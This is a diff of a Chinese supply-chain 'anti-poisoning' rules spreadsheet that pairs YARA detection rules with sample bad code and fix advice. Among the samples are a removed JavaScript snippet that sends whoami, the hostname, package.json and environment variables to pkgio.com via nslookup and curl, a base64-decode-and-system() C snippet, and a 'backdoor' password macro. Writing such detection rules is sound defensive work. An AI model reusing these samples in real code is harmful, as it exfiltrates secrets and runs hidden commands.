--- a/tools/SoftwareSupplyChainSecurity-v1/防投毒规则.xlsx
+++ b/tools/SoftwareSupplyChainSecurity-v1/防投毒规则.xlsx
@@ -1,14 +1,14 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="5" rupBuild="20393"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="5" rupBuild="20395"/>
   <workbookPr/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="D:\PycharmProjects\softwaresupplychain\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="D:\PycharmProjects\new-repo\anti-poisoning\tools\SoftwareSupplyChainSecurity-v1\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{2A13739A-6DB4-4AD5-BAA5-4F8271AA588D}" xr6:coauthVersionLast="36" xr6:coauthVersionMax="36" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{7383544F-F6F9-4200-A778-5067F7B0C672}" xr6:coauthVersionLast="36" xr6:coauthVersionMax="36" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="0" windowWidth="28620" windowHeight="11205" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
@@ -16,14 +16,14 @@
     <sheet name="各社区使用规则集统计" sheetId="1" r:id="rId1"/>
   </sheets>
   <definedNames>
-    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">各社区使用规则集统计!$A$1:$G$47</definedName>
+    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">各社区使用规则集统计!$A$1:$G$49</definedName>
   </definedNames>
   <calcPr calcId="144525"/>
 </workbook>
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="322" uniqueCount="163">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="336" uniqueCount="167">
   <si>
     <t>语言类型</t>
   </si>
@@ -44,9 +44,6 @@
   </si>
   <si>
     <t>C</t>
-  </si>
-  <si>
-    <t>c_scan/c_yara/c_password_strcmp.yar_all</t>
   </si>
   <si>
     <t>检测源码中的硬编码口令</t>
@@ -72,17 +69,6 @@
     <t>void eval_func2() {
         const char* decode = base64_decode("BASE64BASE64BASE64BASE64==");
         system(decode);
-    }</t>
-  </si>
-  <si>
-    <t>c_scan/c_yara/hardcode_pw_define.yar</t>
-  </si>
-  <si>
-    <t>检测源码中的宏定义口令</t>
-  </si>
-  <si>
-    <t>void eval_func3() {
-        #define PASSWORD "backdoor"
     }</t>
   </si>
   <si>
@@ -125,9 +111,6 @@
         }</t>
   </si>
   <si>
-    <t>js_scan/js_decode_exec1.yar_strong</t>
-  </si>
-  <si>
     <t>检测解密执行恶意代码</t>
   </si>
   <si>
@@ -201,21 +184,6 @@
     }</t>
   </si>
   <si>
-    <t>js_scan/js_send_info.yar</t>
-  </si>
-  <si>
-    <t>检测侧信道信息外发</t>
-  </si>
-  <si>
-    <t>function vuln7() {
-        // 侧信道外发敏感信息
-        let cmd = "nslookup $(whoami).u.pkgio.com; nslookup $(uname --nodename).h.pkgio.com;" + 
-        "curl -X POST -d @package.json -H 'X-BOT:nope' https://www.pkgio.com/.x773/package.json;" + 
-        "env &gt; /tmp/.env; curl -X POST -d @/tmp/.env -H 'X-BOT:nope' https://www.pkgio.com/.x773/package.json"
-        require('child_process').exec(cmd);
-    }</t>
-  </si>
-  <si>
     <t>js_scan/shell_damge_sys.yar</t>
   </si>
   <si>
@@ -606,12 +574,6 @@
     <phoneticPr fontId="1" type="noConversion"/>
   </si>
   <si>
-    <t>代码中存在宏定义的口令，存在被质疑为后门的可能，禁止在代码中存放口令。
-此外，如果在开源代码中存放口令，容易被黑客窃取，从而造成损失。
-修复方式：放到执行环境的环境变量或配置文件中。</t>
-    <phoneticPr fontId="1" type="noConversion"/>
-  </si>
-  <si>
     <t>修改建议</t>
     <phoneticPr fontId="1" type="noConversion"/>
   </si>
@@ -687,6 +649,72 @@
   <si>
     <t>检测到代码中存放的token/secret/access_key等关键字，存在泄露的风险，可能已被泄露，请及时排查和移除。
 修复方式：放到执行环境的环境变量或配置文件中。</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>c_scan/c_yara/c_define_password_strict.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>C</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>c_scan/c_yara/c_obfuscated_3.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>c_scan/c_yara/c_obfuscated_all2.yar_all</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>c_scan/c_yara/c_obfuscated_all.yar_all</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检测被混淆的C代码</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>无</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>C代码被混淆，正常情况下开源代码不该被混淆</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>// https://github.com/gavxin/CSCO
+int OOO000OO(int OO0OOO00,int O000OO0O){int OO000O0O,OOOOO0O0;OO000O0O=OOOO0000[OO0OOO00];OOOOO0O0=OOOO0000[OO0OOO00];O00O000O:if(!(OO0OOO00&lt;O000OO0O))goto O0OO0O0O;{O0O0000O:if(!(OO0OOO00&lt;O000OO0O&amp;&amp;OOOO0000[O000OO0O]&gt;=OOOOO0O0))goto O0O0OOO0;--O000OO0O;goto O0O0000O;O0O0OOO0:;OOOO0000[OO0OOO00]=OOOO0000[O000OO0O];O000OOOO:if(!(OO0OOO00&lt;O000OO0O&amp;&amp;OOOO0000[OO0OOO00]&lt;=OOOOO0O0))goto OOOO00O0;++OO0OOO00;goto O000OOOO;OOOO00O0:;OOOO0000[O000OO0O]=OOOO0000[OO0OOO00];}goto O00O000O;O0OO0O0O:;OOOO0000[OO0OOO00]=OO000O0O;return OO0OOO00;}</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>// http://stunnix.com/prod/cxxo/sample.shtml
+#ifndef	z186deb3bb2
+static char*zd904d243ce=
+;
+#endif
+#if	defined(z863a8162bc)
+#include &lt;config.h&gt;
+#endif
+#ifdef WIN32
+#define z0143994977
+#define z9e60e34570
+#define zdd31a60d5f
+#define z8a0c6a09f3</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>js_scan/js_decode_exec.yar_strong</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>js_scan/js_obfuscate_io_detect.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>// https://obfuscator.io
+(function(_0x40dd5c,_0x2cdbbd){var _0x211b57=_0x2919,_0x19918a=_0x40dd5c();while(!![]){try{var _0x255555=parseInt(_0x211b57(0x1a3))/0x1*(parseInt(_0x211b57(0x198))/0x2)+parseInt(_0x211b57(0x19e))/0x3*(-parseInt(_0x211b57(0x19c))/0x4)+parseInt(_0x211b57(0x1a2))/0x5+parseInt(_0x211b57(0x19b))/0x6*(-parseInt(_0x211b57(0x197))/0x7)+-parseInt(_0x211b57(0x19f))/0x8+parseInt(_0x211b57(0x19d))/0x9*(parseInt(_0x211b57(0x199))/0xa)+parseInt(_0x211b57(0x1a0))/0xb*</t>
     <phoneticPr fontId="1" type="noConversion"/>
   </si>
 </sst>
@@ -1078,10 +1106,10 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
-  <dimension ref="A1:G51"/>
+  <dimension ref="A1:G53"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="D1" workbookViewId="0">
-      <selection activeCell="F1" sqref="F1"/>
+    <sheetView tabSelected="1" topLeftCell="A32" workbookViewId="0">
+      <selection activeCell="B37" sqref="B37"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.5" x14ac:dyDescent="0.3"/>
@@ -1114,1061 +1142,1091 @@
         <v>5</v>
       </c>
       <c r="G1" s="4" t="s">
-        <v>151</v>
+        <v>142</v>
       </c>
     </row>
     <row r="2" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
       <c r="A2" s="3" t="s">
         <v>6</v>
       </c>
-      <c r="B2" s="3" t="s">
+      <c r="B2" s="5" t="s">
+        <v>154</v>
+      </c>
+      <c r="C2" s="3" t="s">
         <v>7</v>
       </c>
-      <c r="C2" s="3" t="s">
+      <c r="D2" s="3" t="s">
         <v>8</v>
       </c>
-      <c r="D2" s="3" t="s">
-        <v>9</v>
-      </c>
       <c r="E2" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F2" s="2" t="s">
         <v>10</v>
       </c>
-      <c r="F2" s="2" t="s">
+      <c r="G2" s="4" t="s">
+        <v>140</v>
+      </c>
+    </row>
+    <row r="3" spans="1:7" ht="216" x14ac:dyDescent="0.3">
+      <c r="A3" s="5" t="s">
+        <v>155</v>
+      </c>
+      <c r="B3" s="5" t="s">
+        <v>156</v>
+      </c>
+      <c r="C3" s="5" t="s">
+        <v>159</v>
+      </c>
+      <c r="D3" s="3" t="s">
+        <v>8</v>
+      </c>
+      <c r="E3" s="5" t="s">
+        <v>160</v>
+      </c>
+      <c r="F3" s="4" t="s">
+        <v>162</v>
+      </c>
+      <c r="G3" s="4" t="s">
+        <v>161</v>
+      </c>
+    </row>
+    <row r="4" spans="1:7" ht="189" x14ac:dyDescent="0.3">
+      <c r="A4" s="5" t="s">
+        <v>155</v>
+      </c>
+      <c r="B4" s="5" t="s">
+        <v>158</v>
+      </c>
+      <c r="C4" s="5" t="s">
+        <v>159</v>
+      </c>
+      <c r="D4" s="3" t="s">
+        <v>8</v>
+      </c>
+      <c r="E4" s="5" t="s">
+        <v>160</v>
+      </c>
+      <c r="F4" s="4" t="s">
+        <v>163</v>
+      </c>
+      <c r="G4" s="4" t="s">
+        <v>161</v>
+      </c>
+    </row>
+    <row r="5" spans="1:7" ht="189" x14ac:dyDescent="0.3">
+      <c r="A5" s="5" t="s">
+        <v>155</v>
+      </c>
+      <c r="B5" s="5" t="s">
+        <v>157</v>
+      </c>
+      <c r="C5" s="5" t="s">
+        <v>159</v>
+      </c>
+      <c r="D5" s="3" t="s">
+        <v>8</v>
+      </c>
+      <c r="E5" s="5" t="s">
+        <v>160</v>
+      </c>
+      <c r="F5" s="4" t="s">
+        <v>163</v>
+      </c>
+      <c r="G5" s="4" t="s">
+        <v>161</v>
+      </c>
+    </row>
+    <row r="6" spans="1:7" ht="81" x14ac:dyDescent="0.3">
+      <c r="A6" s="3" t="s">
+        <v>6</v>
+      </c>
+      <c r="B6" s="3" t="s">
         <v>11</v>
       </c>
-      <c r="G2" s="4" t="s">
-        <v>148</v>
-      </c>
-    </row>
-    <row r="3" spans="1:7" ht="81" x14ac:dyDescent="0.3">
-      <c r="A3" s="3" t="s">
+      <c r="C6" s="5" t="s">
+        <v>110</v>
+      </c>
+      <c r="D6" s="3" t="s">
+        <v>8</v>
+      </c>
+      <c r="E6" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F6" s="2" t="s">
+        <v>12</v>
+      </c>
+      <c r="G6" s="4" t="s">
+        <v>141</v>
+      </c>
+    </row>
+    <row r="7" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
+      <c r="A7" s="3" t="s">
         <v>6</v>
       </c>
-      <c r="B3" s="3" t="s">
-        <v>12</v>
-      </c>
-      <c r="C3" s="5" t="s">
-        <v>118</v>
-      </c>
-      <c r="D3" s="3" t="s">
-        <v>9</v>
-      </c>
-      <c r="E3" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F3" s="2" t="s">
+      <c r="B7" s="3" t="s">
         <v>13</v>
       </c>
-      <c r="G3" s="4" t="s">
-        <v>149</v>
-      </c>
-    </row>
-    <row r="4" spans="1:7" ht="81" x14ac:dyDescent="0.3">
-      <c r="A4" s="3" t="s">
-        <v>6</v>
-      </c>
-      <c r="B4" s="3" t="s">
+      <c r="C7" s="3" t="s">
         <v>14</v>
       </c>
-      <c r="C4" s="3" t="s">
+      <c r="D7" s="3" t="s">
+        <v>8</v>
+      </c>
+      <c r="E7" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F7" s="2" t="s">
         <v>15</v>
       </c>
-      <c r="D4" s="3" t="s">
-        <v>9</v>
-      </c>
-      <c r="E4" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F4" s="2" t="s">
+      <c r="G7" s="4" t="s">
+        <v>141</v>
+      </c>
+    </row>
+    <row r="8" spans="1:7" ht="337.5" x14ac:dyDescent="0.3">
+      <c r="A8" s="3" t="s">
         <v>16</v>
       </c>
-      <c r="G4" s="4" t="s">
-        <v>150</v>
-      </c>
-    </row>
-    <row r="5" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
-      <c r="A5" s="3" t="s">
-        <v>6</v>
-      </c>
-      <c r="B5" s="3" t="s">
+      <c r="B8" s="3" t="s">
         <v>17</v>
       </c>
-      <c r="C5" s="3" t="s">
+      <c r="C8" s="3" t="s">
         <v>18</v>
       </c>
-      <c r="D5" s="3" t="s">
-        <v>9</v>
-      </c>
-      <c r="E5" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F5" s="2" t="s">
+      <c r="D8" s="3" t="s">
         <v>19</v>
       </c>
-      <c r="G5" s="4" t="s">
-        <v>149</v>
-      </c>
-    </row>
-    <row r="6" spans="1:7" ht="337.5" x14ac:dyDescent="0.3">
-      <c r="A6" s="3" t="s">
+      <c r="E8" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F8" s="2" t="s">
         <v>20</v>
       </c>
-      <c r="B6" s="3" t="s">
+      <c r="G8" s="4" t="s">
+        <v>111</v>
+      </c>
+    </row>
+    <row r="9" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
+      <c r="A9" s="3" t="s">
+        <v>16</v>
+      </c>
+      <c r="B9" s="5" t="s">
+        <v>164</v>
+      </c>
+      <c r="C9" s="3" t="s">
         <v>21</v>
       </c>
-      <c r="C6" s="3" t="s">
+      <c r="D9" s="3" t="s">
+        <v>19</v>
+      </c>
+      <c r="E9" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F9" s="2" t="s">
         <v>22</v>
       </c>
-      <c r="D6" s="3" t="s">
+      <c r="G9" s="4" t="s">
+        <v>109</v>
+      </c>
+    </row>
+    <row r="10" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
+      <c r="A10" s="3" t="s">
+        <v>16</v>
+      </c>
+      <c r="B10" s="3" t="s">
         <v>23</v>
       </c>
-      <c r="E6" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F6" s="2" t="s">
+      <c r="C10" s="3" t="s">
         <v>24</v>
       </c>
-      <c r="G6" s="4" t="s">
-        <v>119</v>
-      </c>
-    </row>
-    <row r="7" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
-      <c r="A7" s="3" t="s">
-        <v>20</v>
-      </c>
-      <c r="B7" s="3" t="s">
+      <c r="D10" s="3" t="s">
         <v>25</v>
       </c>
-      <c r="C7" s="3" t="s">
+      <c r="E10" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F10" s="2" t="s">
         <v>26</v>
       </c>
-      <c r="D7" s="3" t="s">
-        <v>23</v>
-      </c>
-      <c r="E7" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F7" s="2" t="s">
+      <c r="G10" s="4" t="s">
+        <v>112</v>
+      </c>
+    </row>
+    <row r="11" spans="1:7" ht="175.5" x14ac:dyDescent="0.3">
+      <c r="A11" s="3" t="s">
+        <v>16</v>
+      </c>
+      <c r="B11" s="3" t="s">
         <v>27</v>
       </c>
-      <c r="G7" s="4" t="s">
-        <v>117</v>
-      </c>
-    </row>
-    <row r="8" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
-      <c r="A8" s="3" t="s">
-        <v>20</v>
-      </c>
-      <c r="B8" s="3" t="s">
+      <c r="C11" s="3" t="s">
         <v>28</v>
       </c>
-      <c r="C8" s="3" t="s">
+      <c r="D11" s="3" t="s">
+        <v>19</v>
+      </c>
+      <c r="E11" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F11" s="2" t="s">
         <v>29</v>
       </c>
-      <c r="D8" s="3" t="s">
+      <c r="G11" s="4" t="s">
+        <v>125</v>
+      </c>
+    </row>
+    <row r="12" spans="1:7" ht="175.5" x14ac:dyDescent="0.3">
+      <c r="A12" s="3" t="s">
+        <v>16</v>
+      </c>
+      <c r="B12" s="5" t="s">
+        <v>165</v>
+      </c>
+      <c r="C12" s="3" t="s">
         <v>30</v>
       </c>
-      <c r="E8" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F8" s="2" t="s">
+      <c r="D12" s="3" t="s">
+        <v>19</v>
+      </c>
+      <c r="E12" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F12" s="4" t="s">
+        <v>166</v>
+      </c>
+      <c r="G12" s="4" t="s">
+        <v>113</v>
+      </c>
+    </row>
+    <row r="13" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="A13" s="3" t="s">
+        <v>16</v>
+      </c>
+      <c r="B13" s="5" t="s">
+        <v>114</v>
+      </c>
+      <c r="C13" s="3" t="s">
+        <v>30</v>
+      </c>
+      <c r="D13" s="3" t="s">
+        <v>19</v>
+      </c>
+      <c r="E13" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F13" s="3" t="s">
         <v>31</v>
       </c>
-      <c r="G8" s="4" t="s">
-        <v>120</v>
-      </c>
-    </row>
-    <row r="9" spans="1:7" ht="175.5" x14ac:dyDescent="0.3">
-      <c r="A9" s="3" t="s">
-        <v>20</v>
-      </c>
-      <c r="B9" s="3" t="s">
+      <c r="G13" s="4" t="s">
+        <v>113</v>
+      </c>
+    </row>
+    <row r="14" spans="1:7" ht="148.5" x14ac:dyDescent="0.3">
+      <c r="A14" s="3" t="s">
+        <v>16</v>
+      </c>
+      <c r="B14" s="3" t="s">
         <v>32</v>
       </c>
-      <c r="C9" s="3" t="s">
+      <c r="C14" s="3" t="s">
         <v>33</v>
       </c>
-      <c r="D9" s="3" t="s">
-        <v>23</v>
-      </c>
-      <c r="E9" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F9" s="2" t="s">
+      <c r="D14" s="3" t="s">
         <v>34</v>
       </c>
-      <c r="G9" s="4" t="s">
-        <v>133</v>
-      </c>
-    </row>
-    <row r="10" spans="1:7" x14ac:dyDescent="0.3">
-      <c r="A10" s="3" t="s">
-        <v>20</v>
-      </c>
-      <c r="B10" s="5" t="s">
-        <v>122</v>
-      </c>
-      <c r="C10" s="3" t="s">
+      <c r="E14" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F14" s="2" t="s">
         <v>35</v>
       </c>
-      <c r="D10" s="3" t="s">
-        <v>23</v>
-      </c>
-      <c r="E10" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F10" s="3" t="s">
-        <v>36</v>
-      </c>
-      <c r="G10" s="4" t="s">
-        <v>121</v>
-      </c>
-    </row>
-    <row r="11" spans="1:7" ht="148.5" x14ac:dyDescent="0.3">
-      <c r="A11" s="3" t="s">
-        <v>20</v>
-      </c>
-      <c r="B11" s="3" t="s">
-        <v>37</v>
-      </c>
-      <c r="C11" s="3" t="s">
-        <v>38</v>
-      </c>
-      <c r="D11" s="3" t="s">
-        <v>39</v>
-      </c>
-      <c r="E11" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F11" s="2" t="s">
-        <v>40</v>
-      </c>
-      <c r="G11" s="4" t="s">
-        <v>123</v>
-      </c>
-    </row>
-    <row r="12" spans="1:7" ht="189" x14ac:dyDescent="0.3">
-      <c r="A12" s="3" t="s">
-        <v>20</v>
-      </c>
-      <c r="B12" s="3" t="s">
-        <v>41</v>
-      </c>
-      <c r="C12" s="3" t="s">
-        <v>42</v>
-      </c>
-      <c r="D12" s="3" t="s">
-        <v>39</v>
-      </c>
-      <c r="E12" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F12" s="2" t="s">
-        <v>43</v>
-      </c>
-      <c r="G12" s="4" t="s">
-        <v>124</v>
-      </c>
-    </row>
-    <row r="13" spans="1:7" ht="81" x14ac:dyDescent="0.3">
-      <c r="A13" s="3" t="s">
-        <v>20</v>
-      </c>
-      <c r="B13" s="3" t="s">
-        <v>44</v>
-      </c>
-      <c r="C13" s="3" t="s">
-        <v>45</v>
-      </c>
-      <c r="D13" s="3" t="s">
-        <v>39</v>
-      </c>
-      <c r="E13" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F13" s="2" t="s">
-        <v>46</v>
-      </c>
-      <c r="G13" s="4" t="s">
-        <v>125</v>
-      </c>
-    </row>
-    <row r="14" spans="1:7" ht="81" x14ac:dyDescent="0.3">
-      <c r="A14" s="3" t="s">
-        <v>20</v>
-      </c>
-      <c r="B14" s="3" t="s">
-        <v>47</v>
-      </c>
-      <c r="C14" s="3" t="s">
-        <v>48</v>
-      </c>
-      <c r="D14" s="3" t="s">
-        <v>39</v>
-      </c>
-      <c r="E14" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F14" s="4" t="s">
-        <v>126</v>
-      </c>
       <c r="G14" s="4" t="s">
-        <v>128</v>
+        <v>115</v>
       </c>
     </row>
     <row r="15" spans="1:7" ht="81" x14ac:dyDescent="0.3">
       <c r="A15" s="3" t="s">
-        <v>20</v>
+        <v>16</v>
       </c>
       <c r="B15" s="3" t="s">
+        <v>36</v>
+      </c>
+      <c r="C15" s="3" t="s">
+        <v>37</v>
+      </c>
+      <c r="D15" s="3" t="s">
+        <v>34</v>
+      </c>
+      <c r="E15" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F15" s="2" t="s">
+        <v>38</v>
+      </c>
+      <c r="G15" s="4" t="s">
+        <v>117</v>
+      </c>
+    </row>
+    <row r="16" spans="1:7" ht="81" x14ac:dyDescent="0.3">
+      <c r="A16" s="3" t="s">
+        <v>16</v>
+      </c>
+      <c r="B16" s="3" t="s">
+        <v>39</v>
+      </c>
+      <c r="C16" s="3" t="s">
+        <v>40</v>
+      </c>
+      <c r="D16" s="3" t="s">
+        <v>34</v>
+      </c>
+      <c r="E16" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F16" s="4" t="s">
+        <v>118</v>
+      </c>
+      <c r="G16" s="4" t="s">
+        <v>120</v>
+      </c>
+    </row>
+    <row r="17" spans="1:7" ht="81" x14ac:dyDescent="0.3">
+      <c r="A17" s="3" t="s">
+        <v>16</v>
+      </c>
+      <c r="B17" s="3" t="s">
+        <v>41</v>
+      </c>
+      <c r="C17" s="3" t="s">
+        <v>42</v>
+      </c>
+      <c r="D17" s="3" t="s">
+        <v>34</v>
+      </c>
+      <c r="E17" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F17" s="4" t="s">
+        <v>119</v>
+      </c>
+      <c r="G17" s="4" t="s">
+        <v>116</v>
+      </c>
+    </row>
+    <row r="18" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
+      <c r="A18" s="3" t="s">
+        <v>43</v>
+      </c>
+      <c r="B18" s="3" t="s">
+        <v>44</v>
+      </c>
+      <c r="C18" s="3" t="s">
+        <v>45</v>
+      </c>
+      <c r="D18" s="3" t="s">
+        <v>46</v>
+      </c>
+      <c r="E18" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F18" s="2" t="s">
+        <v>47</v>
+      </c>
+      <c r="G18" s="4" t="s">
+        <v>121</v>
+      </c>
+    </row>
+    <row r="19" spans="1:7" ht="189" x14ac:dyDescent="0.3">
+      <c r="A19" s="3" t="s">
+        <v>43</v>
+      </c>
+      <c r="B19" s="3" t="s">
+        <v>48</v>
+      </c>
+      <c r="C19" s="3" t="s">
         <v>49</v>
       </c>
-      <c r="C15" s="3" t="s">
+      <c r="D19" s="3" t="s">
+        <v>46</v>
+      </c>
+      <c r="E19" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F19" s="2" t="s">
         <v>50</v>
       </c>
-      <c r="D15" s="3" t="s">
-        <v>39</v>
-      </c>
-      <c r="E15" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F15" s="4" t="s">
-        <v>127</v>
-      </c>
-      <c r="G15" s="4" t="s">
-        <v>124</v>
-      </c>
-    </row>
-    <row r="16" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
-      <c r="A16" s="3" t="s">
+      <c r="G19" s="4" t="s">
+        <v>122</v>
+      </c>
+    </row>
+    <row r="20" spans="1:7" ht="378" x14ac:dyDescent="0.3">
+      <c r="A20" s="3" t="s">
         <v>51</v>
       </c>
-      <c r="B16" s="3" t="s">
+      <c r="B20" s="5" t="s">
+        <v>123</v>
+      </c>
+      <c r="C20" s="3" t="s">
         <v>52</v>
       </c>
-      <c r="C16" s="3" t="s">
+      <c r="D20" s="3" t="s">
         <v>53</v>
       </c>
-      <c r="D16" s="3" t="s">
+      <c r="E20" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F20" s="2" t="s">
         <v>54</v>
       </c>
-      <c r="E16" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F16" s="2" t="s">
-        <v>55</v>
-      </c>
-      <c r="G16" s="4" t="s">
-        <v>129</v>
-      </c>
-    </row>
-    <row r="17" spans="1:7" ht="189" x14ac:dyDescent="0.3">
-      <c r="A17" s="3" t="s">
-        <v>51</v>
-      </c>
-      <c r="B17" s="3" t="s">
-        <v>56</v>
-      </c>
-      <c r="C17" s="3" t="s">
-        <v>57</v>
-      </c>
-      <c r="D17" s="3" t="s">
-        <v>54</v>
-      </c>
-      <c r="E17" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F17" s="2" t="s">
-        <v>58</v>
-      </c>
-      <c r="G17" s="4" t="s">
-        <v>130</v>
-      </c>
-    </row>
-    <row r="18" spans="1:7" ht="378" x14ac:dyDescent="0.3">
-      <c r="A18" s="3" t="s">
-        <v>59</v>
-      </c>
-      <c r="B18" s="5" t="s">
-        <v>131</v>
-      </c>
-      <c r="C18" s="3" t="s">
-        <v>60</v>
-      </c>
-      <c r="D18" s="3" t="s">
-        <v>61</v>
-      </c>
-      <c r="E18" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F18" s="2" t="s">
-        <v>62</v>
-      </c>
-      <c r="G18" s="4" t="s">
-        <v>153</v>
-      </c>
-    </row>
-    <row r="19" spans="1:7" ht="405" x14ac:dyDescent="0.3">
-      <c r="A19" s="3" t="s">
-        <v>59</v>
-      </c>
-      <c r="B19" s="3" t="s">
-        <v>63</v>
-      </c>
-      <c r="C19" s="3" t="s">
-        <v>64</v>
-      </c>
-      <c r="D19" s="3" t="s">
-        <v>61</v>
-      </c>
-      <c r="E19" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F19" s="4" t="s">
-        <v>155</v>
-      </c>
-      <c r="G19" s="4" t="s">
-        <v>156</v>
-      </c>
-    </row>
-    <row r="20" spans="1:7" ht="409.5" x14ac:dyDescent="0.3">
-      <c r="A20" s="3" t="s">
-        <v>59</v>
-      </c>
-      <c r="B20" s="3" t="s">
-        <v>65</v>
-      </c>
-      <c r="C20" s="3" t="s">
-        <v>66</v>
-      </c>
-      <c r="D20" s="3" t="s">
-        <v>61</v>
-      </c>
-      <c r="E20" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F20" s="4" t="s">
-        <v>155</v>
-      </c>
       <c r="G20" s="4" t="s">
-        <v>154</v>
+        <v>144</v>
       </c>
     </row>
     <row r="21" spans="1:7" ht="405" x14ac:dyDescent="0.3">
       <c r="A21" s="3" t="s">
-        <v>59</v>
-      </c>
